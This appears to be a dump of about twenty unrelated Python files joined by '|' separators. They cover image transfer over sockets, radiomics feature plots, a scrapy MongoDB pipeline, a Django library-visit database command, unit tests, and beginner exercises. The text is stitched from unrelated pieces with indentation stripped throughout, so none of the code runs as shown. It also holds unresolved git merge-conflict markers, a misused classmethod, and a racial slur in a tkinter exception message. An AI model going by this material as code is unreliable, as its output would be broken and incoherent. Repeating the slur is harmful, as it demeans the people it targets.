if not data:
print "data finished"
fp.close()
compress_image(file_name)
ack = False
return ack
fp.write(data)
def data_receive(client):
path = "ironman.jpg"
if client:
ack = False
#receive_data will receive image from clien,write image to disk
ack = receive_data(client,path)
if ack:
print "compression done!!!"
"""
if __name__ == "__main__":
"""basic main method"""
#data_receive()
check = Communication()
threads = []
while True:
#Thread(target = send_or_receive(check))
client,address = check.server.accept()
newthread = Server(client)
newthread.start()
threads.append(newthread)
for t in threads:
t.join()
|
INF = 100000000
h = []
dp = []
def chmin(a, b):
if a > b:
a = b
return a
def rec(i):
#すでにdpが更新されていればリターン
if (dp[i] < INF):
return dp[i]
if i == 0:
return 0
res = INF
#足場i-1からくる
res = chmin(res, rec(i-1)+abs(h[i]-h[i-1]))
#足場i-2からくる
if i > 1:
res = chmin(res, rec(i-2)+abs(h[i]-h[i-2]))
dp[i] = res
return res
if __name__ == "__main__":
n = int(input())
for i in range(n):
hi = int(input())
h.append(hi)
dp = [INF for _ in range(n)]
print(rec(n-1)) |
import pandas as pd
import csv
import sklearn.cluster as cluster
import numpy as np
from sklearn.cluster import KMeans
import seaborn as sns
import matplotlib.pyplot as plt
name=[
'label','original_glszm_GrayLevelVariance',
'log-sigma-1-0-mm-3D_firstorder_Minimum',
'log-sigma-3-0-mm-3D_firstorder_Median',
'log-sigma-3-0-mm-3D_glszm_HighGrayLevelZoneEmphasis',
'log-sigma-3-0-mm-3D_glszm_SmallAreaHighGrayLevelEmphasis',
'log-sigma-3-0-mm-3D_ngtdm_Complexity',
'log-sigma-5-0-mm-3D_glrlm_HighGrayLevelRunEmphasis',
'wavelet-LH_firstorder_90Percentile',
'wavelet-HL_firstorder_10Percentile',
'wavelet-HH_glcm_Autocorrelation',
'wavelet-LL_glrlm_GrayLevelNonUniformity',
'wavelet-LL_glszm_GrayLevelNonUniformity',
'wavelet-LL_gldm_SmallDependenceHighGrayLevelEmphasis',
]
name=['label','log-sigma-1-0-mm-3D_glszm_LargeAreaHighGrayLevelEmphasis',
'log-sigma-3-0-mm-3D_glszm_LargeAreaHighGrayLevelEmphasis',
'log-sigma-5-0-mm-3D_firstorder_Energy',
'log-sigma-5-0-mm-3D_firstorder_TotalEnergy',
'wavelet-LH_firstorder_Energy', 'wavelet-HL_firstorder_Energy',
'wavelet-HL_firstorder_TotalEnergy', 'wavelet-LL_firstorder_Energy',
'wavelet-LL_firstorder_TotalEnergy',
'wavelet-LL_glcm_ClusterProminence']
beta=[0.00523709,0.00682345,0.03613166,0.00517925,-0.01565185,
0.00721222 ,-0.00670309 ,0.01241168 ,-0.00922436 ,0.01110218 ,
-0.00577271 ,-0.00657399 ,0.00519171 ,
]
aaa=np.load('coefs.npy')
beta=aaa[:,1]
name=['id','label','original_glrlm_RunLengthNonUniformity',
'original_glszm_LargeAreaEmphasis',
'log-sigma-1-0-mm-3D_glszm_LargeAreaLowGrayLevelEmphasis',
'log-sigma-1-0-mm-3D_gldm_LargeDependenceHighGrayLevelEmphasis',
'log-sigma-3-0-mm-3D_gldm_LargeDependenceHighGrayLevelEmphasis',
'wavelet-LH_firstorder_Variance', 'wavelet-HL_glcm_ClusterProminence',
'wavelet-HL_ngtdm_Complexity',
'wavelet-HH_glrlm_RunLengthNonUniformity',
'wavelet-HH_gldm_DependenceNonUniformity',
'wavelet-LL_firstorder_Maximum',
'wavelet-LL_glrlm_GrayLevelNonUniformity',
'wavelet-LL_glrlm_LongRunHighGrayLevelEmphasis',
'wavelet-LL_glrlm_ShortRunHighGrayLevelEmphasis',
'wavelet-LL_ngtdm_Complexity']
plt.style.use('ggplot')
with open('R_withfake_features.csv','r') as f:
df = pd.read_csv(f)
df=df[name]
df.to_csv('15_left.csv')
score=(df.iloc[:,1:]*np.array(beta)).sum(1)
score.name='score'
df=pd.concat([df, score], axis=1)
#df = (df - df.mean()) / df.std()
#df.pop('id')
#cls=df.pop('label')
df1 = df.iloc[np.where(df['label']==1)[0],:]
df0 = df.iloc[np.where(df['label'] == 0)[0], :]
#df1.pop('label')
df0.pop('label')
df1.pop('label')
#df = (df - df.mean()) / df.std()
#cls.name='label'
#df=pd.concat([df,cls],axis=1)
#
df1 = (df1 - df.mean()) / df.std()
df0 = (df0 - df.mean()) / df.std()
#df1.to_csv('df1.csv')
#df0.to_csv('df0.csv')
m_1=df1.mean(0).values
m_0=df0.mean(0).values
s_1=df1.std(0).values
s_0=df0.std(0).values
c=[m_1+s_1,m_1-s_1,m_0+s_0,m_0-s_0]
#fig, axes = plt.subplots()
#sns.violinplot(data=df,hue='label',x=name[2])
#plt.legend(['1','2','s','2a'])
#plt.ylim([-1,2])
plt.figure(figsize=(10,10))
plt.plot(m_1,color='r',label='lesion')
plt.plot(c[0], linestyle='dotted',color='r')
plt.plot(c[1], linestyle='dotted', color='r')
plt.plot(m_0,color='b',label='normal')
plt.plot(c[2], linestyle='dotted',color='b')
plt.plot(c[3], linestyle='dotted', color='b')
plt.legend()
#plt.xlabel(name[1:])
x = np.linspace(0, 15, 16)
plt.xticks(x, list(name[1:]+['score']), rotation=90, fontsize=10)
plt.subplots_adjust(left=0.05, wspace=0.2, hspace=0.2,
bottom=0.49, top=0.94)
plt.title('Feature Distributions After LASSO for Diffenrent Classes')
plt.savefig('f_d.jpg')
plt.show()
a=1
|
RECOMMENDED_URL = "http://www.jrvdev.com/ROAR/VER1/Recommnd.asp"
BALANCE_URL = "http://www.jrvdev.com/ROAR/VER1/Overall.asp"
|
import itertools
import os
import random
import matplotlib.pyplot as plt
import numpy as np
import tensorflow as tf
def set_seeds(seed):
"""
Responsible for producing reproducible results
"""
os.environ["PYTHONHASHSEED"] = str(seed)
random.seed(seed)
np.random.seed(seed)
tf.random.set_seed(seed)
def plot_history(history):
"""
Utility function to plot training loss, validation loss & training accuracy, validation accuracy
"""
plt.plot(history.history["accuracy"])
plt.plot(history.history["val_accuracy"])
plt.title("Model Accuracy")
plt.ylabel("Accuracy")
plt.xlabel("Epoch")
plt.legend(["Train", "Validation"], loc="upper left")
plt.show()
def plot_confusion_matrix(
cm, classes, normalize=False, title="Confusion matrix", cmap=plt.cm.Blues
):
"""
This function plots the confusion matrix.
Normalization can be applied by setting `normalize=True`.
"""
plt.imshow(cm, interpolation="nearest", cmap=cmap)
plt.title(title)
plt.colorbar()
tick_marks = np.arange(len(classes))
plt.xticks(tick_marks, classes, rotation=45)
plt.yticks(tick_marks, classes)
if normalize:
cm = cm.astype("float") / cm.sum(axis=1)[:, np.newaxis]
thresh = cm.max() / 2.0
for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):
plt.text(
j,
i,
cm[i, j],
horizontalalignment="center",
color="white" if cm[i, j] > thresh else "black",
)
plt.tight_layout()
plt.ylabel("True label")
plt.xlabel("Predicted label")
plt.show()
|
#!/usr/bin/env python
# encoding: utf-8
#
# @Author: Jon Holtzman
# @Date: March 2018
# @Filename: mkgrid
# @License: BSD 3-Clause
# @Copyright: Jon Holtzman
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
from __future__ import unicode_literals
import argparse
import os
import sys
import subprocess
import matplotlib
matplotlib.use('Agg')
import pdb
from apogee.aspcap import norm
if __name__ == '__main__' :
parser = argparse.ArgumentParser(
prog=os.path.basename(sys.argv[0]),
description='Renormalize FERRE spectra based on fit')
parser.add_argument("file", type=str, help='Input FERRE file name')
parser.add_argument("lib", type=str, help='Input library file name')
parser.add_argument("--write", type=str, help='Output file name', default=None)
parser.add_argument("--plot", help='Make plots?',action="store_true")
parser.add_argument("--done")
parser.add_argument("--host")
args=parser.parse_args()
norm.correct(args.file,args.lib,plot=args.plot,write=args.write)
if args.done is not None :
subprocess.call(['setdone',args.done])
try:
subprocess.call(['setdone',done])
except: pass
print('host', args.host)
if args.host is not None :
try: os.remove(args.done+'.'+args.host)
except: pass
|
import board
import busio
i2c = busio.I2C(board.SCL, board.SDA)
import adafruit_ads1x15.ads1115 as ADS
from adafruit_ads1x15.analog_in import AnalogIn
import time
import numpy as np
import matplotlib.pyplot as plt
# Import SPI library (for hardware SPI) and MCP3008 library.
import Adafruit_GPIO.SPI as SPI
import Adafruit_MCP3008
# Hardware SPI configuration:
SPI_PORT = 0
SPI_DEVICE = 0
mcp = Adafruit_MCP3008.MCP3008(spi=SPI.SpiDev(SPI_PORT, SPI_DEVICE))
# Main program loop.
start_time = time.time()
values = []
for _ in range(20000):
values.append(mcp.read_adc(0))
finish_time = time.time()
print (values)
print (f"1000 samples collected in {finish_time - start_time} seconds, rate of {1000/(finish_time - start_time)})")
plt.plot(values)
plt.show()
|
# O(n) Time | O(n) Space, where n is total elements in array
def zigzagTraverse(array):
# Write your code here.
if len(array) < 1:
return []
zigzags = []
direction = "down"
row = 0
col = 0
while len(zigzags) < len(array) * len(array[0]):
zigzags.append(array[row][col])
if row == len(array) - 1 and col == len(array[0]) - 1:
break
if direction == "down":
row = row + 1
col = col - 1
if col < 0 or row > len(array) - 1:
direction = "up"
col = col + 1
if row > len(array) - 1:
row = row - 1
col = col + 1
else:
row = row - 1
col = col + 1
if row < 0 or col > len(array[0]) - 1:
direction = "down"
row = row + 1
if col > len(array[0]) - 1:
col = col - 1
row = row + 1
return zigzags
|
import re
import cPickle
from foreclosure import Foreclosure
foreclosures = []
for year in ["2007", "2008", "2009"]:
for q in ["1","2","3","4"]:
f = file("data/spreadsheet%s.cfm" % (year+"Q"+q)).read()
pl = len(foreclosures)
first = True
print year, q
for row in re.findall("<tr>(.*?)</tr>", f, re.S):
if first:
format = [r.strip() for r in re.findall("<th>(.*?)</th>", row, re.S)]
first = False
continue
vals = [r.strip() for r in re.findall("<td>(.*?)</td>", row, re.S)]
foreclosures.append(Foreclosure(dict(zip(format, vals))))
#manually counted foreclosures as of nov/2/09
assert len(foreclosures) == 13333
cPickle.dump(foreclosures, file("theforeclosures.pkl", "w"))
|
# -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
from scrapy.exceptions import DropItem
from scrapy.conf import settings
from scrapy import log
import pymongo
#class ValidateItemPipeline(object):
# def process_item(self, item, spider):
# if not all(item.values()):
# raise DropItem("Missing values!")
# else:
# return item
#class TestPipeline(object):
# def __init__(self):
# self.file = open('Boardgames.txt', 'w')
#
# def process_item(self, item, spider):
# line = str(item['rank'][0]) + '\t' + str(item['title'][0])\
# +'\t' + str(item['year'][0]) + '\t'\
# + str(item['gRating'][0]) + '\t' + str(item['avgRating'][0])+ '\t'\
# + str(item['voters'][0]) + '\t' + str(item['ranks'][0])+ '\t'\
# + str(item['typeg'][0]) + '\t' + str(item['category'][0])+ '\t'\
# + str(item['mechanisms'][0]) + '\t' + str(item['age'][0])+ '\t'\
# + str(item['players'][0])+ '\t'\
# + str(item['dificulty'][0]) + '\t' + str(item['language'][0])+ '\t' \
# + str(item['description'][0]) + '\t' + str(item['price'][0]) + '\t' \
# + str(item['timemin'][0]) + '\t' + str(item['timemax'][0]) + '\t' \
# +'\n'
# self.file.write(line)
# return item
class MongoDBPipeline(object):
def __init__(self):
connection = pymongo.MongoClient(
settings['MONGODB_SERVER'],
settings['MONGODB_PORT']
)
db = connection[settings['MONGODB_DB']]
self.collection = db[settings['MONGODB_COLLECTION']]
def process_item(self, item, spider):
self.collection.insert(dict(item))
log.msg("Added to MongoDB database!",
level=log.DEBUG, spider=spider)
return item |
#!/usr/local/bin/python3
'''
----------------------------------------------------
Author: Vivian Ta
LAB 5-1
1) Create an application that uses a dictionary to hold the following data:
--------------------------------------
(1, 'Bob Smith', 'BSmith@Hotmail.com')
--------------------------------------
(2, 'Sue Jones', 'SueJ@Yahoo.com')
--------------------------------------
(3, 'Joe James', 'JoeJames@Gmail.com')
2) Add code that lets users append a new row of data
3) Add a loop that lets the user keep adding rows.
4) Ask the user if they want to save the data to a file when they exit the loop.
5) Save the data to a file if they say 'yes.'
'''
dict1 = {"ID":1, "Name":"Bob Smith", "Email":"BSmith@Hotmail.com"}
dict2 = {"ID":2, "Name":"Sue Jones", "Email":"SueJ@Yahoo.com"}
dict3 = {"ID":3, "Name":"Joe James", "Email":"JoeJames@Gmail.com"}
dict_collection = [dict1, dict2, dict3]
while True:
id = int(input("ID: "))
name = input("Name: ")
email = input("Email: ")
new_row = {"ID":id, "Name":name, "Email":email}
dict_collection.append(dict(new_row))
prompt = input("Add another? y/n ")
if prompt.lower() == 'n': break
save = input("Did you want to save the items you added to /tmp/dict.txt? y/n ")
if save.lower() == 'y':
fileToWriteTo = open("/tmp/dict.txt", "a")
for row in dict_collection:
fileToWriteTo.write(str(row) + '\n')
fileToWriteTo.close()
|
<<<<<<< HEAD
=======
>>>>>>> b461db8a2c2a68dba0af42de3df76fd687069fa5
def cheese_and_crackers(cheese_count, boxes_of_crackers):
print(f"You have {cheese_count} cheeses!")
print(f"You have {boxes_of_crackers} boxes of crackers!")
print("Man that's enough for a party!")
print("Get a blanket. \n")
print("We can just give the function numbers directly:")
cheese_and_crackers(20, 30)
print("OR, we can use variables from our script:")
amount_of_cheese = 10
amount_of_crackers = 50
cheese_and_crackers(amount_of_cheese, amount_of_crackers)
print("We can even do math inside too:")
cheese_and_crackers(10 + 20, 5 + 6)
print("And we can combine the two, variables and math:")
cheese_and_crackers(amount_of_cheese + 100, amount_of_crackers + 1000)
getyourcheese = int(input("Plese input a number of cheese you want:> "))
getyourcrackers = int(input("Input crackers you want:> "))
cheese_and_crackers(getyourcheese, getyourcrackers)
|
import seaborn as sns
import matplotlib.pyplot as plt
import matplotlib.colors as colors
from matplotlib.collections import LineCollection
from .genomeutil import get_intervaltree
class ColorUniversalDesign():
# Okabe & Ito's color palette
# Color Universal Design (CUD) - How to make figures and presentations that are friendly to Colorblind people -
# https://jfly.uni-koeln.de/color/
OkabeIto_cmap = colors.ListedColormap('#E69F00 #56B4E9 #009E73 #F0E442 #0072B2 #D55E00 #CC79A7 #000000'.split())
OkabeIto_cpal = sns.color_palette('#E69F00 #56B4E9 #009E73 #F0E442 #0072B2 #D55E00 #CC79A7 #000000'.split())
class SyntenyViewer():
def __init__(self, rec):
self.__rec = rec
self.__intervals = get_intervaltree(self.__rec)
def show(self, start, end, y_func=None, label_func=None, label_kwargs=None, collection_kwargs=None, feature_filter=None, ax=None):
# Handle default args
y_func = y_func or (lambda _: 0)
label_kwargs = label_kwargs or {}
collection_kwargs = collection_kwargs or {}
feature_filter = feature_filter or (lambda _: True)
ax = ax or plt.gca()
# Draw features as segments
ax.add_collection(LineCollection([
[(start, y_func(feature)), (end, y_func(feature))]
for start, end, feature in self.__intervals[start:end]
if feature_filter(feature)
], **collection_kwargs))
# Add text information
if label_func is not None:
for s, e, data in self.__intervals[start:end]:
if feature_filter(data):
ax.text(
s if data.strand>0 else e, y_func(data), label_func(data),
ha='left' if data.strand>0 else 'right', va='center', **label_kwargs
)
ax.autoscale()
ax.set_xlim(start, end)
ax.set_xlabel('genomic position (bp)')
return ax |
from PIL import Image
def copyImage(source):
dest = Image.new("RGB", source.size)
for x in range(source.size[0]):
for y in range(source.size[1]):
pix = source.getpixel( (x,y) )
dest.putpixel( (x,y), pix)
return dest
def drawBox(source, start, size, color):
endpoints = source.size
dest = copyImage(source)
for x in range(size[0]): #range through each pixel in our block
for y in range(size[1]):
dest.putpixel( (x+start[0],y+start[1]), color)
return dest
def GetBlock(source_img, loc,copy_size):
newImg = Image.new("RGB",copy_size)
width,height = copy_size
for x in range(loc[0], loc[0]+width):
for y in range(loc[1], loc[1] +height):
color = source_img.getpixel((x,y))
newImg.putpixel((x-loc[0], y-loc[1]),color)
return newImg
def PutBlock(small_img,destination,loc):
smallwid, smallhei = small_img.size
deswid,deshei = destination.size
for x in range(loc[0],loc[0] + smallwid):
for y in range(loc[1], loc[1]+smallhei):
color = small_img.getpixel((x-loc[0], y- loc[1]))
destination.putpixel((x,y),color)
def scale(origImage, widthFactor, heightFactor):
wid, ht = origImage.size
newIm = Image.new("RGB", (int(wid *widthFactor),int(ht*heightFactor)))
for i in range(int(wid*widthFactor)):
for j in range(int(ht*heightFactor)):
pixCol = origImage.getpixel((int(i / widthFactor),int(j /heightFactor)))
newIm.putpixel((i,j),pixCol)
return newIm
def CheckerBoard(img1, img2, block_size):
wid1, hg1 = img1.size
wid2, hg2 = img2.size
if(wid1 *hg1 < wid2*hg2):
newwid = (wid1/block_size) *block_size
newhg = (hg1/block_size) * block_size
else:
newwid = (wid2/block_size) *block_size
newhg = (hg2/block_size) * block_size
scale_newimg1 = scale(img1, float(newwid)/wid1,float(newhg)/hg1)
scale_newimg2 = scale(img2, float(newwid)/wid2, float(newhg/hg2))
newImage = Image.new("RGB",(newwid,newhg))
counterx = 0
for x in range(0,newwid,block_size):
countery = 0
for y in range(0,newhg,block_size):
if((counterx + countery) %2 ==0):
imgBlock = GetBlock(img1,(x,y),(block_size,block_size))
else:
imgBlock = GetBlock(img2,(x,y),(block_size,block_size))
PutBlock(imgBlock,newImage,(x,y))
countery += 1
counterx += 1
return newImage
img1 = Image.open("light.jpg")
img2 = Image.open("yellow.jpg")
img3 =CheckerBoard(img1,img2,100)
img3.show()
|
from __future__ import absolute_import
import unittest
from rutermextract.ranker import Ranker
from rutermextract.term_extractor import Term
class RankerTest(unittest.TestCase):
def setUp(self):
self.ranker = Ranker()
def test_rank(self):
terms = [Term(['1'], '1', 1), Term(['2', '2'], '2', 2), Term(['3', '3', '3'], '3', 3)]
self.assertListEqual(list(self.ranker(terms)), [terms[2], terms[1], terms[0]])
def test_rank_with_weight(self):
terms = [Term(['1'], '1', 1), Term(['2', '2'], '2', 2), Term(['3', '3', '3'], '3', 3)]
idf = {'1': 1, '2': 0.3, '3': 0.25}
weight = lambda term: idf.get(term.normalized, 1.0) * term.count
self.assertListEqual(list(self.ranker(terms, weight=weight)), [terms[0], terms[2], terms[1]])
if __name__ == '__main__':
unittest.main()
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
import os
import shutil
from pathlib import Path
import matplotlib.pyplot as plt
import pytest
import torch
import torch.nn as nn
from _pytest.fixtures import SubRequest
from pytest import MonkeyPatch
from torchgeo.datasets import DeepGlobeLandCover
class TestDeepGlobeLandCover:
@pytest.fixture(params=["train", "test"])
def dataset(
self, monkeypatch: MonkeyPatch, request: SubRequest
) -> DeepGlobeLandCover:
md5 = "2cbd68d36b1485f09f32d874dde7c5c5"
monkeypatch.setattr(DeepGlobeLandCover, "md5", md5)
root = os.path.join("tests", "data", "deepglobelandcover")
split = request.param
transforms = nn.Identity()
return DeepGlobeLandCover(root, split, transforms, checksum=True)
def test_getitem(self, dataset: DeepGlobeLandCover) -> None:
x = dataset[0]
assert isinstance(x, dict)
assert isinstance(x["image"], torch.Tensor)
assert isinstance(x["mask"], torch.Tensor)
def test_len(self, dataset: DeepGlobeLandCover) -> None:
assert len(dataset) == 3
def test_extract(self, tmp_path: Path) -> None:
root = os.path.join("tests", "data", "deepglobelandcover")
filename = "data.zip"
shutil.copyfile(
os.path.join(root, filename), os.path.join(str(tmp_path), filename)
)
DeepGlobeLandCover(root=str(tmp_path))
def test_corrupted(self, tmp_path: Path) -> None:
with open(os.path.join(tmp_path, "data.zip"), "w") as f:
f.write("bad")
with pytest.raises(RuntimeError, match="Dataset found, but corrupted."):
DeepGlobeLandCover(root=str(tmp_path), checksum=True)
def test_invalid_split(self) -> None:
with pytest.raises(AssertionError):
DeepGlobeLandCover(split="foo")
def test_not_downloaded(self, tmp_path: Path) -> None:
with pytest.raises(
RuntimeError,
match="Dataset not found in `root`, either"
+ " specify a different `root` directory or manually download"
+ " the dataset to this directory.",
):
DeepGlobeLandCover(str(tmp_path))
def test_plot(self, dataset: DeepGlobeLandCover) -> None:
x = dataset[0].copy()
dataset.plot(x, suptitle="Test")
plt.close()
dataset.plot(x, show_titles=False)
plt.close()
x["prediction"] = x["mask"].clone()
dataset.plot(x)
plt.close()
|
# file libraryuse/libraryuse/management/commands/dbops.py
#
# Copyright 2013 Emory University General Library
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import generators
from libraryuse import settings
import logging
from optparse import make_option
import sys
import os
from datetime import timedelta
import cx_Oracle
from django.db import connection, connections, transaction
from django.core.management.base import BaseCommand, CommandError
from libraryuse.models import LibraryVisit
from django.db.models import Max
class Command(BaseCommand):
help = "perform database maintenance operations"
option_list = BaseCommand.option_list + (
make_option('--refresh-esd',
action='store_true',
dest='refresh_esd',
default=False,
help='Refresh Emory Shared Data copy'),
make_option('--refresh-libraryvisit',
action='store_true',
dest='refresh_libraryvisit',
default=False,
help='Refresh libraryvisit_mv materialized view'),
make_option('--update-libraryvisit',
action='store_true',
dest='update_libraryvisit',
default=False,
help='Update libraryvisit_mv materialized view'),
)
@transaction.commit_manually
def handle(self, *args, **options):
if not (options['refresh_esd'] or options['refresh_libraryvisit'] or options['update_libraryvisit']):
sys.exit('Nothing to do')
if options['refresh_esd']:
self.refresh_esd()
if options['refresh_libraryvisit']:
self.refresh_libraryvisit()
if options['update_libraryvisit']:
self.update_libraryvisit()
@transaction.commit_manually
def refresh_esd(self):
cxn_esd = connections['esd']
cursor_esd = cxn_esd.cursor()
#cursor_esd.execute("select * from V_LUD_PRSN where rownum <= 10")
cursor_esd.execute("select * from V_LUD_PRSN")
cxn_db = connections['default']
cursor_db = cxn_db.cursor()
try:
cursor_db.execute("truncate esd")
for result in self.ResultsIterator(cursor_esd):
cursor_db.execute('''insert into esd (PRSN_I_PBLC, PRSN_I_ECN,
PRSN_E_TITL_DTRY, PRSN_C_TYPE,
PRSN_E_TYPE, EMJO_C_CLSF, DPRT_C, DPRT_N, DVSN_I, DVSN_N,
EMPE_C_FCLT_RANK, PRSN_C_TYPE_HC, PRSN_E_TYPE_HC, EMJO8HC_C_CLSF,
DPRT8HC_C, DPRT8HC_N, DVSN8HC_I, DVSN8HC_N, ACCA_I, ACPR_N,
ACPL_N, STDN_E_CLAS, STDN_F_UNGR, STDN_F_CMPS_ON) values (
md5(%s), md5(%s), %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s,
%s, %s, %s, %s, %s, %s, %s, %s)''', result)
except Exception, e:
transaction.rollback()
cxn_esd.close()
cxn_db.close()
raise CommandError("problem refreshing db.esd: %s" % e)
transaction.commit()
cxn_esd.close()
cxn_db.close()
@transaction.commit_manually
def refresh_libraryvisit(self):
cxn_db = connections['default']
cursor_db = cxn_db.cursor()
try:
try:
cursor_db.execute("drop table libraryvisit_mv")
except:
sys.exc_clear() #no problem
cmd = ('''create table libraryvisit_mv
as select distinct concat(idnumber,substr(term_date,1,16)) as id,
idnumber, lastname, firstname,
str_to_date(concat(substr(term_date,1,16),':00'), '%Y-%m-%d %T') as visit_time,
location, term_number, PRSN_I_PBLC, PRSN_I_ECN, PRSN_I_HR, PRSN8HC_I_HR,
PRSN_I_SA, PRSN_E_TITL_DTRY, PRSN_C_TYPE, PRSN_E_TYPE,
EMJO_C_CLSF, DPRT_C, DPRT_N, DVSN_I, DVSN_N, EMPE_C_FCLT_RANK,
PRSN_C_TYPE_HC, PRSN_E_TYPE_HC, EMJO8HC_C_CLSF, DPRT8HC_C,
DPRT8HC_N, DVSN8HC_I, DVSN8HC_N, ACCA_I, ACPR_N, ACPL_N,
STDN_E_CLAS, STDN_F_UNGR, STDN_F_CMPS_ON
from turnstile, esd
where replace(turnstile.idnumber,' ', '') = esd.PRSN_I_ECN;''')
cursor_db.execute(cmd)
except Exception, e:
transaction.rollback()
cxn_db.close()
raise CommandError("problem refreshing db.libraryvisit_mv: %s" % e)
transaction.commit()
cxn_db.close()
@transaction.commit_manually
def update_libraryvisit(self):
'''This updates the libraryvisit_mv table and then optimizes it.'''
cxn_db = connections['default']
cursor_db = cxn_db.cursor()
last_date = LibraryVisit.objects.all().aggregate(Max('visit_time'))
search_date = last_date['visit_time__max'] + timedelta(minutes=1)
try:
cmd = '''INSERT IGNORE INTO libraryvisit_mv (id,
visit_time, location, prsn_i_pblc, prsn_i_ecn,
prsn_i_hr, prsn8hc_i_hr, prsn_i_sa, prsn_e_titl_dtry, prsn_c_type,
prsn_e_type, emjo_c_clsf, dprt_c, dprt_n, dvsn_i, dvsn_n,
empe_c_fclt_rank, prsn_c_type_hc, prsn_e_type_hc, emjo8hc_c_clsf,
dprt8hc_c, dprt8hc_n, dvsn8hc_i, dvsn8hc_n, acca_i, acpr_n,
acpl_n, stdn_e_clas, stdn_f_ungr, stdn_f_cmps_on)
(SELECT md5(concat(turnstile.idnumber,concat(substr(turnstile.visit_time,1,16),':00'))),
str_to_date(concat(substr(turnstile.visit_time,1,16),':00'), '%Y-%m-%d %T'),
turnstile.library, esd.prsn_i_pblc, turnstile.idnumber, esd.prsn_i_hr, esd.prsn8hc_i_hr,
esd.prsn_i_sa, esd.prsn_e_titl_dtry, esd.prsn_c_type, esd.prsn_e_type,
esd.emjo_c_clsf, esd.dprt_c, esd.dprt_n, esd.dvsn_i, esd.dvsn_n,
esd.empe_c_fclt_rank, esd.prsn_c_type_hc, esd.prsn_e_type_hc, esd.emjo8hc_c_clsf,
esd.dprt8hc_c, esd.dprt8hc_n, esd.dvsn8hc_i, esd.dvsn8hc_n, esd.acca_i, esd.acpr_n,
esd.acpl_n, esd.stdn_e_clas, esd.stdn_f_ungr, esd.stdn_f_cmps_on
FROM turnstile, esd
WHERE (turnstile.idnumber = esd.prsn_i_ecn));
ALTER TABLE libraryvisit_mv ENGINE='InnoDB';'''
cursor_db.execute(cmd)
except Exception, e:
transaction.rollback()
cxn_db.close()
raise CommandError("problem updating db.libraryvisit_mv: %s" % e)
transaction.commit()
cxn_db.close()
def ResultsIterator(self, cursor, howmany=1000):
while True:
results = cursor.fetchmany(howmany)
if not results:
break
for result in results:
yield result |
import sys
test_cases = open(sys.argv[1], 'r')
for test in test_cases:
if test:
line = test.strip().split()
print line[-2]
test_cases.close()
|
x = 5
from tkinter import messagebox
class parameterException(Exception):
def __init__(self,msg):
Exception.__init__(self, msg)
#self.message = msg
#def __str__(self):
# return str(self.message)
def check(num):
if num > 7:
raise parameterException('value error niggaaaaa') #throw an error of type parameterException. Error must be thrown from try block.
def doSomething():
try:
check(8)
print('no error detected')
except parameterException as pe: #catch error of type parameterException
#print(pe) #print the string representation of the parameterException object
messagebox.showerror("Error", pe)
if __name__ == "__main__":
doSomething()
|
#!/bin/env python
'''
Banana Cluster Control Agent Daemon
'''
import sys, os
if __name__ == '__main__':
str_abs_basedir = os.path.dirname(os.path.realpath(__file__))
str_abs_rootdir = os.path.dirname(str_abs_basedir)
sys.path.insert(0, str_abs_rootdir)
from lib.bccagentd import bccagentd
bccagentd.main() |
#
# FFTJet pileup analyzer configuration. Default is the PFJet
# "MC calibration" mode. Here, we collect FFTJetPileupEstimator
# summaries and do not collect FFTJetPileupProcessor histograms.
#
# I. Volobouev, April 27, 2011
#
import math
import FWCore.ParameterSet.Config as cms
fftjetPileupAnalyzer = cms.EDAnalyzer(
"FFTJetPileupAnalyzer",
#
# Label for the histograms produced by FFTJetPileupProcessor
histoLabel = cms.InputTag("pileupprocessor", "FFTJetPileupPFStudy"),
#
# Label for the summary produced by FFTJetPileupEstimator
summaryLabel = cms.InputTag("pileupestimator", "FFTJetPileupEstimatePFUncalib"),
#
# Label for the MC pileup summary
pileupLabel = cms.string("addPileupInfo"),
#
# Labels for fastjet rho and sigma
fastJetRhoLabel = cms.InputTag(""),
fastJetSigmaLabel = cms.InputTag(""),
#
# Label for the energy discretization grid
gridLabel = cms.InputTag("fftjetpatreco", "FFTJetPatternRecognition"),
#
# Label for the collection of primary vertices
srcPVs = cms.InputTag("offlinePrimaryVertices"),
#
# Cut on the nDoF of the primary vertices
vertexNdofCut = cms.double(4.0),
#
# Output ntuple name/title
ntupleName = cms.string("FFTJetPileupAnalyzer"),
ntupleTitle = cms.string("FFTJetPileupAnalyzer ntuple"),
#
# Settings for the types of info we are collecting
collectHistos = cms.bool(False),
collectPileup = cms.bool(True),
collectOOTPileup = cms.bool(False),
collectNumInteractions = cms.bool(True),
collectFastJetRho = cms.bool(False),
collectSummaries = cms.bool(True),
collectGrids = cms.bool(False),
collectGridDensity = cms.bool(False),
collectVertexInfo = cms.bool(False),
verbosePileupInfo = cms.bool(False),
#
# There is a bug somewhere in the module which builds
# PileupSummaryInfo (it shows up in some events with OOP pileup).
# The following kind-of helps avoiding crazy energy values.
crazyEnergyCut = cms.double(2500.0)
)
|
# A User class with both a class attribute
class User:
active_users = 0
def __init__(self, first, last, age):
self.first = first
self.last = last
self.age = age
User.active_users += 1
def logout(self):
User.active_users -= 1
return f"{self.first} has logged out"
def full_name(self):
return f"{self.first} {self.last}"
def initials(self):
return f"{self.first[0]}.{self.last[0]}."
def likes(self, thing):
return f"{self.first} likes {thing}"
def is_senior(self):
return self.age >= 65
def birthday(self):
self.age += 1
return f"Happy {self.age}th, {self.first}"
@classmethod
def display_active_user(cls):
return f"There are currently {cls.active_users} active mods"
class Moderator(User):
total_mods = 0
def __init__(self, first, last, age, community):
super().__init__(first, last, age)
self.community = community
Moderator.total_mods += 1
@classmethod
def display_active_mods(cls):
return f"There are currently {cls.total_mods} active mods"
@classmethod
def remove_post(self):
return f"{self.full_name()} removed a post from the {self.community} community"
# print(user1.likes("Ice Cream"))
# print(user2.likes("Chips"))
# print(user2.initials())
# print(user1.initials())
# print(user2.is_senior())
# print(user1.age)
# print(user1.birthday())
